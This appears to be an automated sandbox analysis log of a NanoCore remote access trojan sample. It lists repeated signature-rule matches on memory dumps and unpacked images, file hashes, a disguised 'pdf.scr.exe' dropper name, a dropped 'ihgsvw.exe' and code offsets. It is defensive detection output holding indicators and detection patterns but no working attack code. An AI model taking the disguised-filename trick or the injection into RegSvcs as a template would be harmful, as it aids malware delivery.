      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: 004349256789197.pdf.scr.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D848E
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E6CDC
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E00B7
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E4088
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D40FE
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E7153
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003F51C9
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D32F7
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E62CA
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E43BF
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DC426
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DF461
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003FD440
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E77EF
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003D286B
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003FD8EE
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DE9B7
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_004019F4
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003E3E0B
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003F4F9A
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeCode function: 0_2_003DEFE2
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BBE0BE
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC8037
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC2007
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BAE1A0
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BDA28E
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BC22C2
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA225D
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BBC59E
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C2C7A3
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BDE89F
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C1291A
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BD6AFB
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C08B27
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BCCE30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C351D2
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BD7169
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA9240
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00BA9499
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeSection loaded: dxgidebug.dll
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dll
      Source: 004349256789197.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
